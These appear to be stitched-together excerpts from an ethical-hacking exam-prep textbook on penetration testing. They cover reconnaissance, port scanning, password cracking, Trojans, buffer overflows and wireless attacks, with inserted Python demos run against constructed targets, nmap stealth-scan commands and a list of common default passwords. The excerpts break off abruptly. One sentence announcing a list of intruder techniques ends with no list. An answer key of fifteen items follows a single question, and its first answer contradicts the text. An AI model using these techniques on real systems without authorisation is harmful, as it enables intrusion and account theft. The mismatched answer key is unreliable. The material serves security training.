The number of network and Web-based applications has increased.
The detrimental impact of a security breach on corporate assets and goodwill is greater than
ever.
Penetration testing is most commonly carried out as a black-box test (that is, with no prior
knowledge of the infrastructure to be tested). At its simplest level, the penetration test involves
three phases:
1. Preparation phase. A formal contract is executed containing nondisclosure of the clients data
and legal protection for the tester. At a minimum, it also lists the IP addresses to be tested and
the time to test.
2. Execution phase. The penetration test is executed, with the tester looking for potential
vulnerabilities.
3. Delivery phase. The results of the evaluation are communicated to the testers contact in the
organization, and corrective action is advised.
Footprinting
Footprinting is the blueprinting of the security profile of an organization. It involves gathering
information about your target's network to create a profile of the organization's networks and systems.
It's an important way for an attacker to gain information about an organization passively (that is,
without the organization's knowledge).
Footprinting employs the first two steps of reconnaissance: gathering the initial target information and
determining the network range of the target. Common tools and resources used in the footprinting
phase are:
Whois
SmartWhois
Nslookup
Sam Spade
Footprinting may also require manual research, such as studying the company's Web page for useful
information. For example:
Company contact names, phone numbers, and email addresses
Company locations and branches
Other companies with which the target company partners or deals
News, such as mergers or acquisitions
Links to other company-related sites
Company privacy policies, which may help identify the types of security mechanisms in place
Other resources that may have information about the target company are:
The SEC's EDGAR database if the company is publicly traded
Job boards, either internal to the company or external sites
Disgruntled employee blogs and Web sites
Trade press
Footprinting also involves social-engineering techniques that will be reviewed later in this chapter.
Scanning
The next four steps of gathering information (identifying active machines, discovering open ports and
access points, fingerprinting the operating system, and uncovering services on ports) are considered
part of the scanning phase. Your goal here is to discover open ports and applications by performing
external or internal network scanning, pinging machines, determining network ranges, and scanning
the ports of individual systems.
Although you're still in the mode of gathering information, scanning is more active than footprinting,
and here you'll begin to get a more detailed picture of your target.
Some common tools used in the scanning phase are:
NMap
Ping
Traceroute
SuperScan
Netcat
NeoTrace
Visual Route
Enumerating
The last step mentioned, mapping the network, is the result of the scanning phase and leads us to the
enumerating phase. As the final pretest phase, the goal of enumeration is to paint a fairly complete
picture of the target.
To enumerate a target, a tester tries to identify valid user accounts or poorly-protected resource
shares using directed queries and active connections to and from the target.
The type of information sought by testers during the enumeration phase can be names of users and
groups, network resources and shares, and applications.
The techniques used for enumerating include:
Obtaining Active Directory information and identifying vulnerable user accounts
Discovering the NetBIOS name with Nbtscan
Using SNMPutil for SNMP
Employing Windows DNS queries
Establishing null sessions and connections
Remember that during a penetration test, you should document every step and discovery for later
exploitation.
VisualRoute. VisualRoute by VisualWare includes integrated traceroute, ping tests, and reverse
DNS and Whois lookups. It also displays the actual route of connections and IP address locations
on a global map.
SmartWhois. Like Whois, SmartWhois by TamoSoft obtains comprehensive info about the
target: IP address, host name or domain, including country, state or province, city, name of the
network provider, administrator and technical support, and contact information. Unlike Whois
utilities, SmartWhois can find the information about a computer located in any part of the world,
intelligently querying the right database and delivering all the related records within a few
seconds.
Sam Spade. Sam Spade, a freeware tool primarily used to track down spammers, can also be
used to provide information about a target. It comes with a host of useful network tools, including
ping, Nslookup, Whois, IP block Whois, dig, traceroute, finger, SMTP VRFY, a Web browser,
keep-alive, DNS zone transfer, SMTP relay check, and more.
Port Scanners
Port scanning is one of the most common reconnaissance techniques used by testers to discover the
vulnerabilities in the services listening on well-known ports. Once you've identified the IP address of a
target through footprinting, you can begin the process of port scanning: looking for holes in the system
through which you, or a malicious intruder, can gain access. A typical system has 65,535 usable port
numbers (1 through 2^16 - 1) for TCP and another 65,535 for UDP, and any one of them can be used to gain
access if the service behind it is unprotected.
Nmap, the most popular port scanner for Linux, is also available for Windows. Nmap can scan a
system in a variety of stealth modes, depending upon how undetectable you want to be. Nmap can
determine a lot of information about a target, such as what hosts are available, what services are
offered, and what OS is running.
Other port-scanning tools for Linux systems include SATAN, NSAT, VeteScan, SARA, PortScanner,
Network Superscanner, CGI Port Scanner, and CGI Sonar.
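The scan the paragraph above describes, reduced to its simplest form, is a TCP connect scan: complete the handshake on each port and classify it by what comes back. The example below is added here (it is not code from the book or from any of the tools named) and runs against a constructed loopback listener so it works offline; the banner text and port choice are part of the example.

```python
"""TCP connect scan with banner grabbing against a constructed local target. One
listener is opened on an ephemeral loopback port so the example runs offline; a
second port is reserved and released so it is known to be closed. States follow
the usual scanner vocabulary: open (handshake completed), closed (RST, i.e.
connection refused), filtered (no answer before the timeout, which a firewall
that silently drops SYNs produces)."""
import socket
import threading


def start_target(banner=b"220 demo-ftp ready\r\n"):
    """Constructed target: a loopback listener that greets each client with a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))            # port 0: let the kernel pick a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:               # listener closed: stop serving
                return
            try:
                conn.sendall(banner)
            except OSError:               # scanner hung up before reading
                pass
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def reserve_free_port():
    """Find a port nobody listens on by binding, noting the number, and releasing it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def scan_port(host, port, timeout=0.5):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"              # target answered the SYN with RST
        except socket.timeout:
            return "filtered"            # nothing came back: dropped or unreachable
        except OSError:
            return "error"


def connect_scan(host, ports, timeout=0.5):
    return {port: scan_port(host, port, timeout) for port in ports}


def open_ports(results):
    return sorted(port for port, state in results.items() if state == "open")


def grab_banner(host, port, timeout=1.0):
    """Read whatever the service volunteers on connect; many daemons name themselves."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256).decode(errors="replace").strip()
```

A connect scan is the noisiest option because every probe completes a handshake that the target application can log; Nmap's SYN scan gets the same open/closed/filtered answer from the first reply without finishing the connection, which is why it needs raw-socket privileges.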
Vulnerability Scanners
Nessus, a popular open-source tool, is an extremely powerful network scanner that can be configured
to run a variety of scans. While a Windows graphical front-end is available, the core Nessus product
requires Linux to run.
Microsofts Baseline Security Analyzer is a free Windows vulnerability scanner. MBSA can be used to
detect security configuration errors on local computers or on computers across a network, and it is
now in its second release. It does have some issues with Windows Update, however, and cant
always tell if a patch has been installed.
Popular commercial vulnerability scanners include Retina Network Security Scanner, which runs on
Windows, and SAINT, which runs on various Unix/ Linux versions.
Password Crackers
Password cracking doesn't have to involve fancy tools, but it's a fairly tedious process. If the target
doesn't lock you out after a specific number of tries, you can keep trying every combination of
alphanumeric characters for as long as it takes. It's just a question of time and bandwidth before
you break into the system.
The most common passwords found are password, root, administrator, admin, operator, demo, test,
webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username].
Three basic types of password-cracking tests can be automated with tools:
Dictionary. A file of words is run against user accounts; if the password is a simple word, it can
be found pretty quickly.
Hybrid. A hybrid attack works like a dictionary attack but adds simple numbers or symbols to the
file of words. This attack exploits a weakness of many passwords: They are common words with
numbers or symbols tacked to the ends.
Brute force. The most time-consuming but comprehensive way to crack a password. Every
combination of character is tried until the password is broken.
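The difference between the three modes is how many guesses each spends before a hit. The example below, added here and not code from the book or from any tool it names, runs all three against a constructed account file of salted SHA-256 hashes; the accounts, salts, suffix list and character set are invented for the example, while the wordlist is the book's own list of common passwords.

```python
"""The three automated guessing modes described above, run against a constructed
account file of salted SHA-256 hashes (the hash scheme and accounts are invented for
this example). Each mode is a generator, so the caller can count how many candidates
were tried before a hit, which is what separates the three in practice."""
import hashlib
import itertools
import string

# Wordlist from the text's list of most common passwords.
WORDLIST = ["password", "root", "administrator", "admin", "operator", "demo", "test",
            "webmaster", "backup", "guest", "trial", "member", "private", "beta"]
SUFFIXES = ("1", "12", "123", "!", "2024")                   # typical hybrid-attack tack-ons
DEFAULT_CHARSET = string.ascii_lowercase + string.digits     # 36 symbols for brute force


def hash_password(password, salt):
    return hashlib.sha256(salt.encode() + password.encode()).hexdigest()


# Constructed targets: account -> (salt, hash). Plaintexts: alice=guest, bob=backup123, carol=zq7
ACCOUNTS = {
    "alice": ("s1", hash_password("guest", "s1")),
    "bob":   ("s2", hash_password("backup123", "s2")),
    "carol": ("s3", hash_password("zq7", "s3")),
}


def dictionary_candidates(words=WORDLIST):
    yield from words


def hybrid_candidates(words=WORDLIST, suffixes=SUFFIXES):
    """Each word as-is, then with every suffix appended."""
    for word in words:
        yield word
        for suffix in suffixes:
            yield word + suffix


def brute_force_candidates(charset=DEFAULT_CHARSET, max_len=3):
    """Every string over charset from length 1 up to max_len, shortest first."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def keyspace_size(charset_len, max_len):
    return sum(charset_len ** n for n in range(1, max_len + 1))


def crack(account, candidates, limit=None):
    """Return (password, attempts) on success, (None, attempts) when the candidate
    stream is exhausted or 'limit' guesses have been spent (an account-lockout
    threshold, or simply the tester's patience)."""
    salt, target = ACCOUNTS[account]
    attempts = 0
    for candidate in candidates:
        if limit is not None and attempts >= limit:
            break
        attempts += 1
        if hash_password(candidate, salt) == target:
            return candidate, attempts
    return None, attempts
```

Against this file the dictionary finds alice on the 10th guess and never finds bob; the hybrid pass finds bob on the 52nd; brute force over 36 symbols needs 34,342 guesses out of a 47,988-entry keyspace to reach carol's three-character password. Each extra character multiplies that keyspace by 36, which is the whole argument for length.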
Brutus. Brutus is a password-cracking tool that can perform both dictionary attacks and brute
force attacks in which passwords are generated from a given character set. It supports multiple
authentication types: HTTP (Basic authentication, HTML Form/CGI), POP3, FTP, SMB, and Telnet.
WebCracker. WebCracker is a simple tool that takes text lists of usernames and passwords and
uses them as dictionaries to implement basic password guessing.
ObiWan. ObiWan is a password-cracking tool that can work through a proxy. It uses wordlists
and alternates numeric or alphanumeric characters with Roman characters to generate possible
passwords.
Trojan Horses
A Trojan is a program that performs unknown and unwanted functions. It could take one or more of
the following forms:
An unauthorized program contained within a legitimate program
A legitimate program that has been altered by the placement of unauthorized code within it
Any program that appears to perform a desirable and necessary function but does something
unintended
Trojans can be transmitted to the computer in several ways: through email attachments, freeware,
physical installation, ICQ/IRC chat, phony programs, or infected websites. When the user signs on
and goes online, the Trojan is activated, and the attacker gains access to the system.
Unlike a worm, a Trojan doesn't typically self-replicate. The exact type of attack depends on the type
of Trojan.
Trojans can be:
Remote access Trojans
Keystroke loggers or password-sending Trojans
Software detection killers
Purely destructive or denial-of-service Trojans
The list of Trojan horses in the wild is expanding quickly, but a few of the earliest have remained
relevant since the beginning, and many of these serve as platforms for the development of more lethal
variations.
Back Orifice 2000 (BO2K) is the granddaddy of Trojan horses and has spawned a considerable
number of imitators. Once installed on a target PC or server machine, BO2K gives the attacker
complete control of the victim.
BO2K has stealth capabilities, will not show up on the task list, and runs completely in hidden mode.
Back Orifice and its variants have been credited with the highest number of infestations of Windows
systems.
Another Trojan that has been around for a considerable time is SubSeven, although it is becoming
less and less of a problem. SubSeven is a backdoor program that enables others to gain full access to
Windows systems through the network.
Other common Trojans and spyware currently in the wild include Rovbin, Canary, Remacc.RCPro,
NetCat, Jgidol, IRC.mimic, and NetBus.
Buffer Overflows
A buffer overflow (or overrun) occurs when a program allocates a specific block length of memory for
something but then attempts to store more data than the block was intended to hold. This overflowing
data can overwrite memory areas and interfere with information crucial to the normal execution of the
program. While buffer overflows may be a side effect of poorly written or buggy code, they can also be
triggered intentionally in order to create an attack.
A buffer overflow can allow an intruder to load a remote shell or execute a command, allowing the
attacker to gain unauthorized access or escalate user privileges. To generate the overflow, the
attacker must create a specific data feed to induce the error, as random data will rarely produce the
desired effect.
For a buffer overflow attack to work, the target system must fail to test the data or stack boundaries
and must also be able to execute code that resides in the data or stack segment. Once the stack is
smashed, the attacker can deploy his or her payload and take control of the attacked system.
Three common ways to test for a buffer overflow vulnerability are as follows:
Look for strings declared as local variables in functions or methods, and verify the presence of
boundary checks in the source code.
Check for improper use of input/output or string functions.
Feed the application large amounts of data and check for abnormal behavior.
Products such as Immunixs Stackguard and ProPolice employ stack-smashing protection to detect
buffer overflows on stack-allocated variables. Also, vulnerability scanners such as Proventia can help
protect against buffer overflow.
Buffer overflow vulnerabilities can be detected by manual auditing of the code as well as by boundary
testing. Other countermeasures include updating C and C++ software compilers and C libraries to
more secure versions and disabling stack execution in the program.
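To make the mechanism concrete, the example below (added here; not code from the book or from the products it names) lays out a 16-byte name buffer directly in front of a 32-bit privilege flag, the way a local array sits beside other locals and the saved return address on the stack, and copies into it first without and then with the boundary check. The ctypes layout, both copy routines and the test inputs are constructed for this example; it also carries out the third test from the list above, feeding inputs of growing length.

```python
"""What an unchecked copy does to the memory next to the buffer, modelled with
ctypes so that the demonstration is deterministic and stays inside one allocated
object. A 16-byte name buffer is followed by a 32-bit privilege flag, the way a
local array sits next to other locals and the saved return address on the stack.
The layout and the two copy routines are constructed for this example."""
import ctypes

NAME_SIZE = 16


class LoginFrame(ctypes.Structure):
    _fields_ = [("name", ctypes.c_char * NAME_SIZE),   # offset 0
                ("is_admin", ctypes.c_uint32)]          # offset 16: the victim of the overflow


def unchecked_copy(data: bytes) -> LoginFrame:
    """The bug: copy len(data) bytes into 'name' with no boundary check (strcpy style).
    The only guard here keeps the write inside the frame so the demo stays well-defined;
    real vulnerable code has no guard at all and keeps writing into whatever follows."""
    frame = LoginFrame()
    if len(data) > ctypes.sizeof(frame):
        raise OverflowError("demo limit: input larger than the whole frame")
    ctypes.memmove(ctypes.addressof(frame) + LoginFrame.name.offset, data, len(data))
    return frame


def checked_copy(data: bytes) -> LoginFrame:
    """The fix: verify the boundary first, leaving room for the terminating NUL."""
    frame = LoginFrame()
    if len(data) >= NAME_SIZE:
        raise ValueError("name too long")
    ctypes.memmove(ctypes.addressof(frame) + LoginFrame.name.offset, data, len(data))
    return frame


def boundary_test(copy_fn, max_len=NAME_SIZE + 4):
    """Third test from the text: feed inputs of growing length and report the first
    length at which behaviour turns abnormal (flag corrupted) or input is rejected."""
    for length in range(max_len + 1):
        try:
            frame = copy_fn(b"A" * length)
        except ValueError:
            return ("rejected", length)
        if frame.is_admin != 0:
            return ("corrupted", length)
    return ("ok", max_len)
```

Seventeen bytes is enough: the sixteenth 'A' fills the buffer and the next byte lands in is_admin, so the unchecked routine turns a guest into an administrator while the checked one rejects the input at 16. On a real stack the bytes past the buffer would be the saved frame pointer and return address, which is what turns this from a logic corruption into code execution.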
War driving is a term used to describe the process of a hacker who, armed with a laptop and a
wireless adapter card and traveling by car, bus, subway train, or other form of mechanized transport,
goes around sniffing for WLANs.
War walking refers to the same process, commonly in public areas like malls, hotels, or city streets,
but using shoe leather instead of the transportation methods listed earlier.
The concept of war driving is simple: Using a device capable of receiving an 802.11b signal, a device
capable of locating itself on a map, and software that will log data from the moment that a network
signal is detected, the hacker moves from place to place, letting these devices do their jobs. Over
time, the hacker builds up a database containing the network name, signal strength, location, and
IP/namespace in use for all of the discovered wireless hotspots.
With SNMP, the hacker may even log packet samples and probe the access points for available data.
The hacker may also mark the locations of the vulnerable wireless networks with chalk on the
sidewalk or building itself. This is called war chalking and alerts other intruders that an exposed
WLAN is nearby.
Common war-driving exploits find many wireless networks with WEP disabled and using only the
SSID for access control. The SSID for wireless networks can be found quickly. This vulnerability
makes these networks susceptible to what's called the parking lot attack, where, at a safe distance
from the building's perimeter, an attacker gains access to the target network.
WLAN Vulnerabilities
Wireless LANs are susceptible to the same protocol-based attacks that plague wired LANs but also
have their own set of unique vulnerabilities. Since wireless access points may proliferate in the
organization, unsecured wireless access points can be a danger to organizations because they offer
the attacker a route around the company's firewall and into the network.
SSID Issues
The service set identifier (SSID) is an identification value programmed in the access point or group of
access points to identify the local wireless subnet. This segmentation of the wireless network into
multiple networks is a form of an authentication check; the SSID acts as a simple password, providing
a measure of security. When a client computer is connected to the access point, the network tries to
confirm the SSID with the computer. If the wireless station does not know the value of the SSID,
access is denied to the associated access point.
The wireless access point is configured to broadcast its SSID. When enabled, any client without an
SSID is able to receive it and have access to the access point. Users are also able to configure their
own client systems with the appropriate SSID because they are widely known and easily shared.
Many access points use default SSIDs provided by the manufacturers, and a list of those default
SSIDs is available for download on the Internet. This means that it's very easy for a hacker to
determine an access point's SSID and gain access to it via software tools.
Also, a non-secure access WLAN mode exists, which allows clients to connect to the access point
using the configured SSID, a blank SSID, or an SSID configured as any.
WEP Weaknesses
Wired Equivalent Privacy (WEP) is a component of the IEEE 802.11 wireless local area network
(WLAN) standard. Its primary purpose is to provide confidentiality of data on wireless networks at a
level equivalent to that of wired LANs.
IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping on a
network. This is accomplished by encrypting data with the RC4 encryption algorithm.
Nevertheless, WEP is vulnerable because of relatively short keys that remain static. Most WEP
products implement a 64-bit shared key, using 40 bits of this for the secret key and 24 bits for the
initialization vector. The key is installed at the wired network AP and must be entered into each client
as well.
WEP was not designed to withstand a directed cryptographic attack. WEP has well-known flaws in the
encryption algorithms used to secure wireless transmissions. Two programs capable of exploiting the
RC4 vulnerability, AirSnort and WEPCrack, both run under Linux, and both require only a relatively
small amount of captured data.
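The 24-bit initialization vector is the concrete reason the static key above is weak: the RC4 keystream for a frame is derived from the IV plus the secret, so whenever an IV value repeats under the same static secret, two frames are encrypted with an identical keystream. The following Python is an added example written for this page, not code from the CEH Prep Guide or from any tool it names. It works out the size of the IV space and the birthday-bound estimate of how soon a randomly chosen IV repeats; the frame rate and random seed used in the demonstration are constructed values.

```python
import math
import random

# WEP parameters from the text: a 64-bit key made of a 40-bit static secret
# and a 24-bit per-frame initialization vector (IV) transmitted in the clear.
WEP_SECRET_BITS = 40
WEP_IV_BITS = 24


def iv_space(iv_bits: int = WEP_IV_BITS) -> int:
    """Number of distinct IVs, hence distinct RC4 keys, available per static secret."""
    return 1 << iv_bits


def expected_frames_to_first_repeat(iv_bits: int = WEP_IV_BITS) -> float:
    """Birthday-bound estimate sqrt(pi*N/2) of how many frames are sent before
    two of them carry the same IV, assuming IVs are chosen uniformly at random."""
    return math.sqrt(math.pi * iv_space(iv_bits) / 2)


def repeat_probability(frames: int, iv_bits: int = WEP_IV_BITS) -> float:
    """Probability that at least one IV value repeats among `frames` random IVs
    (standard birthday approximation 1 - exp(-k(k-1)/2N))."""
    n = iv_space(iv_bits)
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * n))


def seconds_to_exhaust_ivs(frames_per_second: float, iv_bits: int = WEP_IV_BITS) -> float:
    """Worst case for a sequential IV counter: time until every IV has been used
    once and the counter wraps, reusing keystream under the same static secret."""
    return iv_space(iv_bits) / frames_per_second


def simulate_first_repeat(iv_bits: int = WEP_IV_BITS, seed: int = 1) -> int:
    """Draw random IVs until one repeats; returns the number of frames sent at
    the moment of the first repeat (one run of the birthday experiment)."""
    rng = random.Random(seed)
    n = iv_space(iv_bits)
    seen = set()
    frames = 0
    while True:
        frames += 1
        iv = rng.randrange(n)
        if iv in seen:
            return frames
        seen.add(iv)


if __name__ == "__main__":
    # 500 frames/s is a constructed rate for a moderately busy access point.
    print("distinct IVs:", iv_space())                                   # 16777216
    print("expected frames before first random IV repeat: %.0f"
          % expected_frames_to_first_repeat())                           # about 5134
    print("P(repeat within 12000 frames): %.3f" % repeat_probability(12000))
    print("hours to exhaust the IV counter at 500 frames/s: %.1f"
          % (seconds_to_exhaust_ivs(500) / 3600))                        # about 9.3
    print("simulated first repeat after", simulate_first_repeat(), "frames")
```

The numbers explain why the text says the attack tools need only a "relatively small" capture: with roughly 16.8 million IVs per static key, random IV selection produces the first keystream reuse after about five thousand frames, and even a sequential counter wraps within hours on a busy network. Rotating the secret, which WEP has no mechanism for, is the only way to grow the effective space; this is the gap the 802.11i migration listed later in the countermeasures closes.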
Wireless networks are vulnerable to DoS attacks, as well, due to the nature of the wireless
transmission medium. WLANs send information via radio waves on public frequencies, thus they are
susceptible to interference from traffic using the same radio band, whether the interference is
deliberate or accidental.
If an attacker makes use of a powerful transmitter, enough interference can be generated to prevent
wireless devices from communicating with one another. DoS attack devices do not have to be right
next to the devices being attacked; they need only be within range of the wireless transmissions.
Examples of techniques used to deny service to a wireless device are:
Request for authentication at such a frequency as to disrupt legitimate traffic.
Request deauthentication of legitimate users. These requests may not be refused according to
the current 802.11 standard.
Mimic the behavior of an access point to convince unsuspecting clients to communicate with it.
Repeatedly transmit RTS/CTS frames to silence the network.
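The defensive counterpart to the list above is rate-based detection of authentication, deauthentication and disassociation floods in a wireless IDS. The Python below is an added example written for this page, not code from the CEH Prep Guide or from any of the tools it describes. It runs a sliding-window counter over a constructed sequence of 802.11 management frames; the MAC addresses, timestamps, window length and threshold are made-up values, while the management subtype numbers are those defined by the 802.11 frame control field.

```python
from collections import defaultdict, deque

# IEEE 802.11 management-frame subtype values (frame control field).
SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_AUTH = 0xB
SUBTYPE_DEAUTH = 0xC

# The subtypes the text lists as abuse vectors, with the alert label to raise.
WATCHED = {
    SUBTYPE_AUTH: "auth-flood",
    SUBTYPE_DEAUTH: "deauth-flood",
    SUBTYPE_DISASSOC: "disassoc-flood",
}


def detect_mgmt_floods(frames, window=1.0, threshold=20):
    """frames: iterable of (timestamp_seconds, subtype, source_mac).

    Keeps, per (subtype, source), the timestamps seen within the last `window`
    seconds and raises one alert per source/subtype the first time the count
    reaches `threshold`. Returns a list of
    (label, source_mac, first_ts, last_ts, count) tuples."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, subtype, src in sorted(frames):
        if subtype not in WATCHED:
            continue                      # beacons, probes etc. are not counted
        key = (subtype, src)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((WATCHED[subtype], src, q[0], ts, len(q)))
    return alerts


def constructed_capture():
    """Constructed sample traffic: beacons from an AP, a few legitimate
    authentications, then a burst of deauthentication frames carrying the
    AP's own address as source (the pattern of a forged deauth flood)."""
    ap = "00:11:22:33:44:55"        # constructed AP address
    client = "aa:bb:cc:00:00:01"    # constructed client address
    frames = []
    for i in range(30):                                      # 3 s of beacons, 10/s
        frames.append((i * 0.1, SUBTYPE_BEACON, ap))
    for i in range(5):                                       # 5 auths in 1.5 s: normal
        frames.append((0.5 + i * 0.3, SUBTYPE_AUTH, client))
    for i in range(60):                                      # 60 deauths in 0.6 s: flood
        frames.append((1.0 + i * 0.01, SUBTYPE_DEAUTH, ap))
    return frames


if __name__ == "__main__":
    for alert in detect_mgmt_floods(constructed_capture()):
        print(alert)
```

Counting by source address cannot distinguish a forged deauthentication carrying the AP's address from one the AP really sent, so an alert is a trigger for investigation (which channel, which clients dropped, signal strength of the frames) rather than proof. The protocol-level fix is protected management frames (IEEE 802.11w), which did not exist in the 802.11 standard the text refers to; without it, stations must honour deauthentication requests as the list above notes.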
NetStumbler. NetStumbler displays wireless access points, SSIDs, channels, whether WEP
encryption is enabled, and signal strength. NetStumbler can connect with GPS technology to log
the precise location of access points.
MiniStumbler. This is a smaller version of NetStumbler designed to work on PocketPC 3.0 and
PocketPC 2002 platforms. It provides support for ARM, MIPS, and SH3 CPU types.
AirSnort. AirSnort is a WLAN tool that cracks WEP encryption keys. AirSnort passively monitors
wireless transmissions and automatically computes the encryption key when enough packets
have been gathered.
Kismet. Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system.
Kismet identifies networks by passively collecting packets and detecting standard named
networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of
non-beaconing networks via data traffic.
SSID Sniff. A tool to use when looking to discover access points and save captured traffic.
Comes with a configured script and supports Cisco Aironet and various prism2-based cards.
WifiScanner. WifiScanner analyzes traffic and detects 802.11b stations and access points. It can
listen alternately on all 14 channels, write packet information in real time, and search for access
points and associated client stations. All network traffic may be saved in the libpcap format for
analysis.
Wireless packet analyzers, or sniffers, basically work the same way as wired network packet
analyzers: They capture packets from the data stream and allow the user to open them up and look
at, or decode, them. Some wireless sniffers don't employ full decoding tools but show existing WLANs
and SSIDs.
A few of the wireless sniffers available are:
AirMagnet. AirMagnet is a wireless tool originally developed for WLAN inventory, but it has
become a useful wireless security assessment utility.
AiroPeek. WildPackets' AiroPeek is a packet analyzer for IEEE 802.11b wireless LANs,
supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI, and IPX.
AiroPeek is used to isolate security problems by decoding 802.11b WLAN protocols and by
analyzing wireless network performance with an identification of signal strength, channel, and
data rates.
Sniffer Wireless. McAfee Sniffer Wireless is a packet analyzer for managing network
applications and deployments on Wireless LAN 802.11a and 802.11b networks. It has the ability
to decrypt Wired Equivalent Privacy (WEP)-based traffic.
Wireless offers the possibility of always-on, instant mobile communications; however, the
vulnerabilities inherent to wireless computing present daunting hurdles. These vulnerabilities
(eavesdropping, session hijacking, data alteration and manipulation, in conjunction with an overall
lack of privacy) are major challenges posed by wireless technologies.
Fortunately, steps can be taken to lessen the impact of these threats. Securing wireless networks
includes adopting a suitable strategy such as MAC address filtering, firewalls, or a combination of
protocol-based measures. A few specific steps are:
Change the AP's default admin password.
Change the access point's default SSID.
Disable the Broadcast SSID function on the AP.
Enable WEP with the stronger 128-bit encryption, not the breakable 40-bit.
Employ MAC address filtering.
Implement an authentication server to provide strong authentication.
Physically locate the AP in an area that limits its radio emanations.
Logically put the AP in a DMZ with the firewall between the DMZ and the internal network.
Implement VPN tunnels.
Disable DHCP, and assign static IP addresses.
Test penetration vulnerability regularly.
Research migrating to 802.11i technologies and new WEP encryption workarounds.
Social Engineering
Social engineering describes the acquisition of sensitive information or inappropriate access privileges
by an outsider, by manipulating people. It exploits the human side of computing, tricking people into
providing valuable information or allowing access to that information.
Social engineering is the hardest form of attack to defend against because it cannot be prevented with
hardware or software alone. A company may have rock-solid authentication processes, VPNs, and
firewalls but still be vulnerable to attacks that exploit the human element.
Social engineering can be divided into two types: human-based, person-to-person interaction and
computer-based interaction using software that automates the attempt to engineer information.
Common techniques used by an intruder to gain either physical access or system access are:
Assessment Questions
The answers to these questions can be found in Appendix A.
Footprinting involves which two steps in the seven-step process of gathering information?
a. Mapping the network and detecting operating systems
b. Detecting operating systems and fingerprinting services
c. Identifying active machines and finding open ports
d. Gathering information and determining the network range
1. Answer: b
2. Answer: c
3. Answer: a
4. Answer: d
5. Answer: b
6. Answer: c
7. Answer: a
8. Answer: a
9. Answer: b
10. Answer: c
11. Answer: a
12. Answer: d
13. Answer: c
14. Answer: a
15. Answer: d
Linux History
Linux is a Unix-like operating system family, as well as one of the most prominent examples of free
software and open source development; its underlying source code can be modified, used, and
redistributed by anyone, freely. In 1991, Linus Torvalds began to work on the Linux kernel while he
was attending the University of Helsinki. Torvalds originally intended Linux to be a noncommercial
replacement for Minix. Figure 11-1 shows the development timeline of the Unix family of operating
systems and how Linux fits in.
A Linux distribution (called a distro) is a member of the Linux family of Unix-like operating systems
comprising the Linux kernel, the nonkernel parts of the GNU operating system, and assorted other
software.
There are currently over 300 Linux distribution projects in active development, some commercial,
some free. The more popular are:
Debian
Gentoo
Fedora Core (Red Hat)
SUSE Linux (Novell)
Ubuntu (Canonical Ltd.)
Mandriva Linux
Linux distributions take a variety of forms, from fully featured desktop and server operating systems to
minimal implementations, for use in embedded systems, or for booting from a floppy.
Compiling Programs in Linux
There are generally three steps to compiling programs under Linux:
1. Configuring how the program will be compiled
2. Compiling the program
3. Installing the program
The corresponding command sequence is typically:
$ ./configure
$ make
$ su
Password:
$ make install
$ exit
NMap
Many Linux tools work quite well for scanning. The most popular port scanner for Linux is probably
NMap (www.insecure.org/NMap). Also available for the Windows platform, NMap can scan a system
in a variety of stealth modes, depending upon how undetectable you want to be. NMap can determine
a lot of information about a target, like what hosts are available, what services are offered, and what
OS is running.
We've covered NMap in a lot of detail earlier in the book, but let's review the four most common
command-line settings NMap uses to perform a network scan:
Stealth Scan, TCP SYN: nmap -v -sS 192.168.0.0/24
UDP Scan: nmap -v -sU 192.168.0.0/24
Stealth Scan, No Ping: nmap -v -sS -P0 192.168.0.0/24
Fingerprint: nmap -v -O 192.168.0.0/24 #TCP
Other port scanning tools for Linux systems include SATAN, NSAT, VeteScan, SARA, Portscanner,
Network Superscanner, CGI Port Scanner, and CGI Sonar.
SATAN
The first-generation assistant, the Security Administrator's Tool for Analyzing Networks (SATAN), was
developed in early 1995. It became the benchmark for network security analysis for several years;
however, few updates were provided and the tool slowly became obsolete. It has been superseded by
Saint, Nessus, and SARA.
Nessus
One essential type of tool for any attacker or defender is the vulnerability scanner. Although intended
to be used to harden systems, the vulnerability scanner allows the attacker to connect to a target
system and check for such vulnerabilities as configuration errors, default configuration settings that
allow attackers access, and the most recently reported system vulnerabilities.
The preferred open-source tool for this is Nessus (www.nessus.org). Nessus is an extremely powerful
network scanner and can be configured to run a variety of attacks. Nessus is a security scanner for
Linux, BSD, Solaris, and other flavors of Unix, performs over 900 remote security checks, and
suggests solutions for security problems.
Cheops-ng has the ability to probe hosts to see what services they are running. On some services,
Cheops-ng is able to see what program is running for a service and the version number of that
program. Figure 11-3 shows a Cheops-ng service listing.
SARA
The Security Auditor's Research Assistant (SARA) (www-arc.com/sara) is a third-generation Unix-based security analysis tool that supports the FBI Top 20 Consensus on Security. It operates on most
Unix-type platforms, including Linux and Mac OS X, and is the upgrade of the now-outdated SATAN
tool. Getting SARA up and running is a straightforward compilation process, and SARA interfaces with
NMap for OS fingerprinting. Some of SARA's features include:
Integrates with the National Vulnerability Database (nvd.nist.gov)
Performs SQL injection tests
Adapts to many firewalls
Supports CVE standards
Available as a free-use open SATAN-oriented license
Sniffit
Sniffit (http://reptile.rug.ac.be/~coder/sniffit/sniffit.html) is a popular and fast Ethernet packet sniffer for
Linux. You can run it either on the command line with optional plug-ins and filters or in interactive
